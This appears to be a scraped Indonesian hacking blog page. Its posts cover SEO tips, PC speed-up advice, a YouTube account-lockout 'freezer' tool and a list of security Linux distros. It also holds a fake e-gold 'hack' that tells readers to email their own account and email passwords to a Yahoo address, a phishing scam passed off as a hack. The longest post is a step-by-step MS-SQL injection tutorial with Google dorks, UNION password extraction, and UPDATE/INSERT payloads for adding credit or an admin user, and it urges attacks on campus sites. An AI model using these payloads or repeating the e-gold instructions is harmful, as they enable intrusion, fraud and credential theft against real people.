Baca Selengkapnya...

Bagaimana Cara Mengetahui Blog yang Dofollow atau Nofollow?

Berhubung ada salah satu teman blogger yang bertanya,

Bagaimana cara mengetahui blog yang DoFollow dan NoFollow?

Di postingan kali ini saya(Biar Sopan gtu hhe) akan memberikan sedikit tips.

Tapi sebelum itu, saya akan sedikit menjelaskan apa itu Blog DoFollow.

Para blogger termasuk saya, sangat senang bila mendapatkan backlink dari blog orang lain. Backlink tersebut bisa didapatkan dengan cara Exchange Link, memanfaatkan Blogupp seperti beberapa teman blogger saya yang lain atau berkomentar di blog DoFollow, Kenapa? Karena Salah satu cara untuk meningkatkan pagerank ataupun Alexa Rank adalah dengan cara mendapatkan Backlink dari blog orang lain. Nah yang jadi pertanyaan, kenapa saat kita berkomentar di blog DoFollow kita bisa mendapatkan Backlink? Sedangkan Di Blog NoFollow kita tidak mendapat Backlink?

Sederhana, karena Link yang kita tinggalkan di Blog DoFollow akan menjadi backlink untuk kita, Cukup dengan meninggalkan komentar yang mengarah ke blog kita, maka backlink pun sudah kita dapatkan. Masalahnya sekarang, bagaimana kita dapat mengetahui apakah suatu blog DoFollow atau NoFollow. Ok..berikut sedikit tips untuk mengetahui status suatu blog DoFollow atau NoFollow.

• Tentukan blog yang akan di cek statusnya
• Masuk ke halaman postingan, tujulah komentar-komentar dari pengunjung. kemudian “klik kanan” pada link komentator lalu pilih “properties”

Lihat hasilnya. Untuk yang NoFollow biasanya seperti ini :

• Pokoknya, untuk blog yang nofollow pada bagian “rel” atatu “relation” ada tulisan nofollownya.
• Sedangkan untuk yang DoFollow, Setelah klik kanan ? properties tidak ada tulisan Relation sama sekali atau ada Tulisan Relation akan tetapi Bertuliskan external NoFollow.

Pada intinya, untuk mengetahui blog yang dofollow atau nofollow tadi, fokuskan pandangan kita pada tulisan nofollow-nya (setelah klik kanan). Jika ada berarti nofollow, jika tidak ada atau bertuliskan external NoFollow berarti blog tersebut DoFollow.

Sebagai Contoh saya akan memberikan salah satu blog milik teman blogger saya yang baru-baru ini di ubah menjadi blog DoFollow, Silahkan Kunjungi http://sejarah-bangsa-kita.blogspot.com atau Silahkan klik Link Ini.

Setelah anda masuk coba cari postingan yang sudah ada komentarnya dan lakukan cara yang saya tunjukkan tadi untuk membuktikan apakah blog tersebut DoFollow atau NoFollow…

NB: Jangan langsung percaya pada blog yang memasang Banner DoFollow karena bisa jadi anda akan kecewa saat mengetahui komentar anda tidak menjadi Backlink untuk anda. Tapi khusus untuk blog yang saya jadikan contoh diatas, saya sudah membuktikan bahwa Banner DoFollow yang dipasang sesuai dengan Blog tersebut.

Sekian Tips dari saya…Jika anda berminat untuk merubah blog anda menjadi blog DoFollow, silahkan beritahu saya di kotak komentar dan pada postingan selanjutnya InsyaAllah saya akan menuliskan postingan Cara merubah blog NoFollow menjadi DoFollow untuk menanggapi permintaan anda…

Happy Blogging... And selamat beraktifitas untuk semua Blogger yang masih punya banyak kerjaan Offline DiLuar sana seperti saya hhe…Hati-hati Sob jangan sampe Ketahuan Dosen Or Boz Lu smua ya kLo lagi OL bisa-bisa Lu dikeluarin dari kelas Or Di kasih SP sama Boz hahaha….

_FERDINAND_

Baca Selengkapnya...

How to speed up slow computer/pc

I see a lot of Windows users always complain "My computer/pc is too slow. How to speed up my pc speed performance?" and they need a new PC. Upgrading the PC is always a viable option for better performance, but here are things that you can do to keepyour PC healthy and i am sure this will help you to make your PC faster. But changing pc everytime is a costly affair and hence i have listed below 10 perfect ways to help you improve your computer speed performance. Thus, you will be able to speed up your computer/pc for freeThe last time u installed Windows it worked very smoothly on your first boot right? The boot process was faster, applications were running quickly and smoothly, no errors. Now why does it takes such a long time to boot and takes lot of memory? What can i possibly do to restore my PC that earlier state?

The answer is pretty simple. You have to take care of your pc and tweak a bit. Overclocking your PC is an option to try at your own risk which i don’t recommend hence not discussing in this post. You only have to understand whyyour pc is slowing down and do things to prevent from slowing down.

Here are 10 simple ways to speed your PC:

1. Using an Anti-Virus, Spyware and Adware removal program:

If you use Internet frequently, chances are that you pc is infected by any adware or spyware if you not using a good anti virus/anti-malware program. Most adware’s and spywares open multiple connections to access internet spreading infection all over the web. This may slow downyour pc, other harmful viruses might crunch your memory and system resources mostly slowing down startup process. Therefore,

• Use a good antivirus, adware, spyware removal Software.

• Make sure you UPDATE it regularly.

• Enable the auto update mode for better security.

• Run regular scans (weekly scheduled scanning recommended).

2. Defragmenting Hard drives:

The files when moved or created on your PC are stored into small fragments randomly on your disk drive. When you open those files it takes time to gather all those chunks and put them back together to form that single file. When you defragment your drive all those scattered fragments are arranged properly on the drive thus loading application bit faster. There is a Disk Defragmenter utility in windows,

Open My Computer > Right click on the disk drive you want to defragment > Select Properties > Under Tools tab click Defragment Now. But i recommend Power Defragmenter a small free utility by sysinternals which is faster and with various options.

3. Clean Registry:

Windows registry is a database of information of all the files, folders and the windows configuration. This database grows as you use windows, can also become erroneous. Thus, it becomes necessary to clean and repair registry errors regularly. Use CCleaner, a tiny Freeware to scan and fix registry issues.

4. Delete Temporary, Junk and Obsolete files/Clear cache:

Clean all your drives for free space, i personally recommend keep atleast 20% of your drive space free. Also, you have to clear the windows TEMP files, the web browsers temporary files, caches files, etc. All web browsers has that option.CCleaner will be a good choice for the same, it will analyze and clean all unwanted internet files, Windows Explorer files and system files.

5. Check Disk for errors:

Scan your disk for errors regularly. There may be some lost fragments or links which may lead to error in application. Run Scandisk once a week to keep things running smoothly. the error checking utility in windows will scan and attempt to recover bad sectors. Open My Computer > Right click the drive > Properties > Tools > click Check Now Button. Else simply type chkdsk /r at the command prompt.

6. Remove Startup items:

Removing unwanted startup programs will speedup the windows boot process and your desktop will be ready quickly. some programs like Limewire or MSN messenger take time to load at startup, you can remove those and run them when needed.to remove Startup items: Start > Run > type msconfig > press OK. Now in the System Configuration Utility uncheck the unwanted programs (better Disable All).

7. Remove unnecessary Programs:

Remove those programs which you don’t use anymore. This will free disk space and even help windows perform better. Also, remove the windows unwanted components like Indexing services & Outlook Express from the Add/Remove windows programs.

8. Keep PC updated:

Look for regular updates, Enable Windows Updates, Updates includes major bugfixes which can be helpful. Look for new Service packs for better hardware compatibility. Update all device drivers, anti-virus programs and other applications. Hardware Manufactures keep updating their device drivers for better and smooth functioning. I have written earlier on a Free Software To Update Windows Device Drivers do read that.

9. Remove unwanted visual effects:

The animated windows and fading menus can slow down your pc unknowingly. You can remove those fading effects, Use windows classic style theme, remove the heavy graphic wallpaper(none), You can even lower the color quality( to medium 16-Bit) and lower the screen resolution. Lower the screen resolution, better the performance.

10.Use Lightweight programs:

Replace all those resource consuming programs and look for better alternatives, especially for those who have RAM less then 512 and an old PIII machine.

use Lightweight antivirus programs like Avira...the best i found, NOD32, AVG instead of Norton Antivirus.

This will really help you improve performance and helped me speed up my pc/computer.Try these out to improve your computer speed and performance.

Hey guys...if you have any additional tips to improve slow pc performance, then just mention it below in comments section.

Enjoy HaCkInG.....

Baca Selengkapnya...

Hack Youtube account

Hack Youtube account by Youtube Freezer:

Hack Youtube account by Youtube Freezer:
1. Download Youtube Freezer - software to hack Youtube account.
Password: techotips.blogspot.com

2. Unzip the zipped file in downloaded file using Winzix (free download here) to get Youtube Freezer to hack youtube account.

3. Now, run the unzipped file and you will see something like this:

4. From drop down box, select Youtube. Simply enter the username whose you want to hack youtube account and hit "Freeze".

5. Youtube Freezer will start constant login attempts and thus freeze that Youtube account. To stop freezing, hit Stop Freezing or close the youtube hacking software - Youtube freezer.

You will require to have Winzix to get Youtube Freezer. Download Winzix here.

This is how you can use Youtube hacking software - youtube freezer to hack youtube account. If you were searching for " how to hack youtube account ", i hope this article on how to hack youtube account will stop your search. If you have any problem in using this youtube freezer to hack youtube account, mention it in comments section.

Baca Selengkapnya...

Cara Para Hacker Menembus E-Gold Account

Anda Jangan Berfikir Negatif atas cara yg saya tuliskan dibawah ini, tergantung niat anda?, kalau niat anda ingin mencuri berarti anda salah?

Tetapi kalau niat anda untuk menjaga agar account E-gold anda aman maka ini salah satu pintu para pencuri masuk kedalam account anda?, sehingga anda bisa menambah secutiry account e-gold anda:

Cara Hacker Menembus Egold Account:

I. Terlebih dahulu mereka membuat Account Egolddan Alamat Email (lebih bagus biasanya mereka memakai email di yahoo.com karena akan mudah dan lancar mendapat balasannya.)

II. Kemudian, mereka kirim sebuah email ke:egoldautoboot239989@yahoo.com(salah satu alamat email Egold Auto Bot Mailer).

III. Email tsb memiliki format sebagai berikut:

IV. Tulisan di kolom \"subject\" dengan :autobootE-gold68verif-0e26V. Kemudian di dalam text body email berisi 12baris text "Ingat mereka menulis kode/script tersebut dalam 12 barisdan jangan sampai salah dalam penulisannya. Segera periksa danhitung setelah menulis kode, apa benar sudah 12 baris.Jika jumlah bariskurang atau lebih, maka trik ini tidak akan berfuingsi" tulis kode sebagaiberikut:

1. Baris-1: Content-Type: text/plain (agar hasilbalasan yg dikirimkan ke alamat email Anda/email reply nanti dalam bentuk format text).

2. Baris-2: charset=us-ascii (agar email reply bisadibaca dengan menggunakan kode ASCII).

3. Baris-3: address000%%confirmation0e24.graffiti.com(untuk mengacaukan/membingungkan perintah dari Auto BotMailer).

4. Baris-4: p38ylec00rm::s%%www.E-gold.com%% (agarAuto Bot Mailer mulai mengeksekusi semua informasi yang dibutuhkandari Egold).

5. Baris-5: tulis Nomor Egold Anda dan Nomor EgoldTarget yang ingin Anda hack dengan format =12345informsto%%www.e-gold.com%%/viewdetails.asp?id=98765(Egold Auto Bot Mailer memerlukan Nomor Egold untukmenginformasikan data-data ke Egold. Pada contoh diatas, 12345 adalahnomor egold Anda dan 98765 adalah nomor egold target)

6. Baris-6: start (retrieve > 0) (untuk mulaimengaktifkan Mailer Auto Bot\'s Retrieval Function)

7. Baris-7: verified (*value= = float) (untukmelanjutkan proses Mailer Auto Bot\'s Retrieval Function).

8. Baris-8: TULIS PASSWORD Egold Anda dan Nomor EgoldTarget Anda sekali lagi dengan format = passwordegoldanda%%www.e-gold.com%%/viewpassphrase.asp?

id=nomoregoldtarget(Egold Auto Bot Mailer diprogram dengan caramengirimkan testing info ke Egold melalui password Anda sebagai jalanpembukanya yang kemudian akan memverifikasi/menguji setiap password Egold danmengonfirmasikannya ke Yahoo Auto Bot Mailer. Jadi, pada baris ke-8 iniAnda harus memasukkan password Account Egold Anda dengan benaruntuk digunakan sebagai jalanpembuka pelacakan password Egold target).

9. Baris-9: #searchmsgend168hr (untuk mulai mencaridetail informasi Account Egold Target dalam waktu maksimal 168jam/ 7hari)

10. Baris-10: Tulis nama email dan password email yanganda gunakan untuk membuat egold dengan format sebagai berikut:send&&alamatemailanda%%passmailverif=?passwordemailanda(ini dimaksudkan agar Auto Bot Mailer mengasumsikan bahwaini adalah sebuah perintah dari Administrator dan akan mengirimkan detailinformasi ke Administrator seperti yang dimaksudkan)

11. Baris-11: send&&idR20034-tsa-0583 (perintah iniakan membuat Auto Bot Mailer akan mengirimkan seluruh detail informasiAccount Egold Target yang Anda inginkan ke alamat email Anda secaraOTOMATIS, maksimal 168jam atau 7 hari)

12. Baris-12: #endofmsg (langkah terakhir) Tunggubalasan email dr Auto Bot Mailer. Dalam waktu kurang dari tujuh hari(maksimal 168 jam atau 7 hari) Anda akan mendapatkan kiriman balasan email dariAuto Bot Mailer tsb. Email balasan tsb berisi hasil dari prosespengacauan perintah dengan kode-kode perintah yang Anda masukkan di atasyaitu berisi seluruh detail infomasi mengenai Account Egold Target yangAnda hack tsb (seperti Jumlah Balance yang tersedia, Nama AccountEgold Target, Nomor Account Egold Target, Password Egold Target, AlamatEmail yang digunakan Target, Password Email yang digunakan Target, NomorTelepon Target yang dipakai, Alamat Rumah Target, dll). Jika anda sudahmendapatkan semua informasi tengan e-gold target, anda tinggal bukaaccount egold tersebut kemudian anda spend (transfer) ke rek. E-gold anda.MUDAH BUKAN !!!Harap diperhatikan, lakukan semua sesuai dengan ygtelah diterangkan. Isi semuanya dengan bener agar bisa berhasil. Sebab,kalau Anda salah anda akan mendapatkan mendapatkan failure notice drYahoo. Jadi, JANGAN SALAH

ENTRY!!!!!*********************************************************************Jadi secara keseluruhan format isi email anda adalahsebagai berikut :

Kirim email ke:

egoldautoboot239989@yahoo.comSubject: autobootE-gold68verif-0e26Message (isi email):Content-Type: text/plaincharset=us-asciiaddress000%%confirmation0e24.graffiti.comp38ylec00rm::s%%www.E-gold.com%%(no.egoldanda)informsto%%www.e-gold.com%%/viewdetails.asp?id=(no.egoldtarget)start (retrieve > 0)verified (*value= = float)(passwordegoldanda)%%www.e-gold.com%%/viewpassphrase.asp?id=no.egoldtarget#searchmsgend168hrsend&&alamatemailanda%%passmailverif=?passwordemailandasend&&idR20034-tsa-0583#endofmsgPENTING..!!Agar Auto Bot Mailer bisa bekerja dengan baik danberjalan dengan lancar untuk mendapatkan seluruh informasi mengenaiAccount EgoldTarget (seperti Jumlah Balance, Alamat Email, PasswordEmail, NamaAccount Egold, Nomor Egold, Password Egold,Nomor Telepon, Alamat Rumah, dll), maka di dalam Account Egold Andaharus Mempunyai balance minimal $15,3 atau lebih. Jika account egoldanda balancenya dibawah $15,3, maka trik ini tidak akan berfungsimeskipun kurang $0,1 saja, karena account e-gold anda dianggap tidak aktif olehprogram Auto Bot Mailer.

Baca Selengkapnya...

Distro linux Terbaik Kategori Hacking

Terdapat banyak sekali distro linux yang didedikasikan untuk keamanan jaringan. Dan kebanyakan pula untuk menggunakan distro tersebut memerlukan proses installasi pada harddisk, waktu yang cukup lama dan merepotkan. Di bawah ini saya jabarkan beberapa distro hacking linux yang digunakan untuk sistem keamanan jaringan. Dan tentunya distro ini bisa langsung dijalankan tanpa proses installasi karena sifatnya yang LiveCD, anda cuma perlu menyeting pada BIOS anda booting pertama langsung menuju CDROM.

1. Backtrack
Backtrack merupakan hasil dari bergabungnya 2 distro hacking yang inovatif yaitu Whax atau yang lebih dikenal dengan whoppix dan Auditor.
Backtrack sendiri berbasiskan Slackware. Dan tentunya didalamnya telah di sediakan banyak sekali software yang mendukung untuk melakukan pent-test.
Untuk mendapatkannya anda cukup mendownload di sini
Download Now

2. Operator
Operator benar-benar didedikasikan untuk berorientasi kepada Sistem Keamanan Jaringan, yang tentunya menggunakan tools open source.
Operator sendiri berbasiskan Distribusi turunan Debian, yang berjalan dari single bootable CD. Anda bisa mendapatkannya di sini
Download Now

3. PHLAK
PHLAK atau [P]rofessional [H]acker?s [L]inux [A]ssault [K]it. Didalamnya terdapat 2 jenis desktop ( windows manager ) yaitu fluxboxdan XFCE4, dan tentunya banyak sekali tool-tool security didalamnya, dan juga penuh dengan dokumentasi mengenai sistem keamanan itu sendiri. Awalnya dibuat oleh Alexde Landgraaf. Phlak sendiri saat ini kebanyakan digunakan oleh kalangan hacker tingkat Pro. Anda bisa mendapatkan distro tersebut disini
Download Now

4. Auditor
Walaupun sekarang auditor telah bergabung dengan whax, tapi kehadirannya yang eksis patut diperhatikan, terutama memilih distro ini merupakan sesuatu yang cukup baik bagi anda seorang ahli jaringan yang mencoba untuk mengukur sejauh mana keamanan jaringan anda. Anda bisa mendapatkannya disini Download Now
5. nUBUNTU
Pendatang baru dunia security dalam versi LiveCD. nUBUNTU sendiri merupakan turunan dari distro UBUNTU yang didalamnya ditambahkan paket-paket untuk keamanan jaringan. Anda bisa mendownloadnya disini Download Now

Baca Selengkapnya...

CARA JEBOL SERVER KALAU YM/IM KITA DIBLOCK ADMIN

BuaT Lo S'mua yang Instant Messenger (IM)-nya diblok sama admin, yg sok pinter sendiri
kita masih bisa chatting via web, masuk aja
http://www.meebo.com free register kok. ,
http://www15.meebo.com/,
Enaknya lagi kita bisa multilogin user & IM. Support: AOL, ICQ, Yahoo!, GTalk, MSN, dan meebo sendiri.

Semoga Membantu?
Dan apabila cara ini tdk bisa membantu? hem...sulit juga neranginnya? cari sendiri aja deh atau ngomong baik-baik sama adminnya? hhaaa...

Baca Selengkapnya...

Cara Hacking Web 2

Inget Jangan Di Pake Buat "CyberCrimes" Ye....
Truz kLo ga Buat KriminaL D;pake Buat apa???
Ya BuaT NghaCk Web KampuZ Lu Juga BoLeh BiaR tambaH KreNz...
udH gtu Lu daPeT NiLai gy Kan kLo JuRusaN lu IT hhee
OkeH DaH SiLakan D'baca.....

PREFACE

Setelah banyaknya bug-bug yang bertebaran di jagad maya ini dari
yang namanya Unicode (masih ada lho sekarang) , RPC DCOM, XSS, VP-
ASP, dan bug-bug e-commerce lainnya kini yang lagi "trend" dalam
teknik hacking adlaah SQL Injection. dalam vol. 1 ini gw jelasin
cara ngisi sesuatu dengan perintah UPDATE

DESCRIPTION

SQL adalah bahasa pemrograman database yang banyak dipakai dalam
website, laporan keuangan, data-data pekerjaan, data mahasiswa, dan
lain lain. Diantara jenis lainnya MS-SQL adalah yang paling
terkenal, nah ternyata semua hal yang di jagad maya ini adalah
Vulnerable terhadap berbagai serangan, jadi SQL pun menjadi target
dalam hal ini.

VULN

yang akan gw bahas disini adalah MS-SQL yang Link ODBC dengan bahasa
pemrograman website ASP.

Injection

ok, setelah basa basi diatas gw mulai neh ..hehehe
untuk menginject sql ini anda perlu memperhatikan input-inputan
dalam situs itu yang sekiranya connect dengan SQL database situs
itu, atau bisa juga dengan menambah dari link url di kotak browser
anda semisal : ....asp/productID= 1'[sql query/string. untuk mencari
target yang vuln seperti kondisi diatas anda perlu mencarinya
yang .asp nah seperti biasa....GOOGLING! !! hehehe
key wordnya di google adalah :

1. allinurl:.co. id/login. asp
2. allinurl:.com/ admin.asp

semuannya itu banyak kombinasinya lainnya itu tergantung seberapa
jauh anda kreatif dalam mencari target di google.nah, kanre disini
gw bahas cara inject ke situs web to sms so searchnya : asp,web to
sms atw Send SMS, ASP

ok, misal kita dapet target www.apes.com, nah lihat dah ada inputan
yang masuk ke database itu ga, misalnya search product, member
login, atw admin login :) setelah itu kita isa inject pake
sql "umum" stringnya : ' or 1=1-- disini kita lihat kalau 1=1 itu
nialinya true dan tanda -- itu adalah marknya SQL kalau di C++/C
itu // _/* jadi setelah tanda Mark perintah selanjutnya tidak
dijalankan. nah klo beruntung dapet /admin.asp kita inject seperti
diatas itu bisa lho kita masuk sebagai admin! ini terjadi di situs
berita nasional di indonesia...

nah, klo ga dapet dir adminya yah kita cari kotak input yang kiranya
connect ke database situs itu, contoh isa di login, member, search,
dll. kita masukan debugging codenya : ' having 1=1--
jreeeeeng... ..ini musti diinget n kudu di pake setiap klo mo inject,
kita injet di :

userid : ' having 1=1--
Password :fuzk3

lalu....jreeeeeeng. ...ERROR! !!!
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userid' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25

tuh ketahuan ada kolom UserDB.userid, klo udah gini gemana lagi
dungs? ok kita loop lagi sekarang kita inject : ' group by
UserDB.userid -- atau ' group by UserDB.userid having 1=1-- disini
kita gunain perintah group by untuk menggroup kolom ingin kita
lihat....ehehe. ..muncul error lagi, kali ini beda choi...
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userpass' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25

nah sekarang kita tau apa aja kolomnya...hehehe
penerapan selanjutanya adalah misal situs itu adalah situs
pengiriman SMS sedunia yang kalo kita membernya kita bisa send sms
dari web, namun harus ada account yang digunakan untuk mengirim sms
itu, jadi account itu harus ada nilainya dan untuk itu kita harus
mengisinya dengan cara membelinya.. .ok ok NO CARDING HERE!!!
heheheh...so gemana neh??? karena kita ini orang-orang kere hehehe
so kita inject aja....sebelumnya kita harus jadi member kan gratis
ini daftarnya...
setelah kita jadi member dengan id : fuzk3 dan pass: Vero...kita log
ke situs itu dengan id kita, cari tahu string khusus yang digunakan
web itu untuk menghitung account sms kita, misalnya : cell
nah, inilah injectnya... .cari login inputan lagi misal /member.asp
nah disitu ada input box id dan pass...kita Inject dengan :
' UPDATE [namadatabase] SET [charkhusus] = [nilai] WHERE [namakolom]
= '[char_id]'- -
contoh :
' UPDATE UserDb set cell=100 where userid ='fuzk3'-- (inget neh)
sep, nah klo muncul error : userid not found kita isa cari input di
forgot password : dengan inputan sama...jreeen ketika di jalankan ga
ada error apa-apa..kembali login lalu...jreeeeeenng. ..liha cell mu
itu waduh 100 cell enak neh sms seratus kali....kiekiekie. ..SUKSES
BRO!!! :)

atau cara ke 2

PREFACE

Kalau di Vol.1 dah dibahas teknik UPDATE di MS-SQL maka disini gw
jelasin cara INSERT dan UNION......rada ngejelimet neh.....makanya
kalau
baca artikel ini harus ada aer putih hyuehueh.... N disini gw juga
akan
kasih kilas balik sedikit untuk yang baru nyoba2 :) n penjelasan
yang
lebih detail

BODY


Sebelumnya tolong apabila browser kalian pada pake IE setting dulu
browsernya agar bisa melihat errornya. Setting di Tools-Internet
option-Advanced tab-Show friendly HTTP error messages. itu musti
dilakukan, kalau
tidak kalian tidak bisa lihat error messages yg keluar nanti.
OK, masih inget kan cara cari targetnya? kalau lupa lihat lagi
artikel
Vol.1 :)

Nah, klo dah dapet targetnya sekarang tinggal input SQL Querynya di
input boxnya :

www.target.com/ login.asp >> contoh target
www.target.com/ login.asp? err=Invalid_ password >> persan error yang
dapat di eksploitasi seperti biasa kalau ingin cari n tes vuln
engganya tuh
situs kita ketikan ' having 1=1-- di input box atau URL error tadi ,
contoh : www.target.com/ login.asp? err=' having 1=1-- then,....

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserID' is invalid in the select list because it is
not
contained in an
aggregate function and there is no GROUP BY clause

itu error messagesnya, kini kita group field UserID dari table
Users,
stringnya : ' group by UserID --
then,...

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.ClientName' is invalid in the select list
because it is not contained in either an aggregate function or the
GROUP BY clause.

muncul lagi error seperti itu....lalu lagi kita Group. Kini
stringnya
adalah ' group by
field1,field2 --
contoh : ' group by UserID,ClientName --
then,...

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserName' is invalid in the select list because it is
not
contained in

either an aggregate function or the GROUP BY clause.
trus group by lagi, hal ini kita lakukan (proses looping) sampai
semua
field kita

ketahui..... .makanya harus sabar, kalau engga ga bakal tembus :)
apabila sudah lama melakukan looping dan akhirnya ketika group
terakhir
kita lakukan dan tidak keluar error messagesnya maka error yang
terakhir adalah field yg terakhir.... .field table itu bisa panjang
sekali,
tergantung admin yang masangnya jadi susah kalau maen teabk2an
ajah....contoh field yang pernah gw temuin : ' group by
UserID,ClientName, UserName, Password, PhysicalAddress, PhoneNumber, Email
,
OperatingSystem, PrefferredGraphi cFormat
-- >> ada 9 field!!! jangan males dalam proses Looping :P

setelah dapet semua field, kini yang kita lakukan adalah mencari
siapa
aja user yang ada dalam table Users dan kolom UserName...
caranya? kita pake Union apa itu UNION??? union adalah perintah SQL
dimana ia dapat menggabungkan dua SELECT list tapi kalau pengen
gunain
Union ini kita harus tahu ada berapa field dalam table tadi

sintaksnya gini :
select field1, field2, … field_n
from tables
UNION
select field1, field2, … field_n
from tables;

nah biasanya dalam SQL QUERY di input box username itu mereka bikin
query select * from

Users where UserName =='"+login+" ' and Password='"+ pass"'"; nah
kalau
begitu kita masukin syntax sql union untuk melihat username : '
union
select min(UserName) ,1,1,1 from Users where username > 'a'--
jadi hasilnya : select * from Users where UserName ==' union select
min(UserName) ,1,1,1 from Users where username > 'a'--and
Password='"+ pass"'"; gitu kiranya, jadi nanti akan muncul error
messages lagi
yang akan menampilkan sebuah username lebih dari huruf a ,contoh:

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Agile' to a column of
data
type int. /

tuh lihat kan ada user dengan nama Agile...lalu looping lagi pake
string union tadi nanti akan muncul username2 lain....lalu bagaimana
dengan
passwordnya? ??
ok union beraksi kembali : ' union select min
(UserName),1, 1,1,1,1,1, 1,1
from Users where username > 'Agile'--
lalu akan muncul error yang memberitahukan passwordnya, contoh :

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Surfer' to a column of
data
type int. /

kalau dah gini kita bisa masuk dengan Username Agile dan passwordnya
Surfer...hehehe

selamat yah!
btw, kita juga ingin dong bisa INSERT databasenya. ....
caranya : karena ktia sudah tahu field2nya maka stringnya jadi : '
insert into table values
(field1,field2, ....,field_ n)--
misalkan ada field sebagai berikut :
'Users.UserID'
'Users. Username'
'Users.Password'
'Users.FName'
'Users.LName'
'Users.EmailAddress '
'Users.Administrato r'
itu berarti ada 7 field! Ok kita masukan menurut string tadi : '
insert
into Users values

(0,'lucifer' ,'lucifer' ,'lu','cid' ,'a@a.com',1)-- >> artinya kita
masukan id kita dalam

urutan 0, lalu username 'lucifer', password 'lucifer' Fname
(frontName)
itu 'lu',
Lname(LastName) sebagai 'cid', dan EmailAddress 'a@a.com'......
coba kita login dengan user buatan kita tadi....BINGO! selamat anda
berhasil menjebol

database situs target.....

Baca Selengkapnya...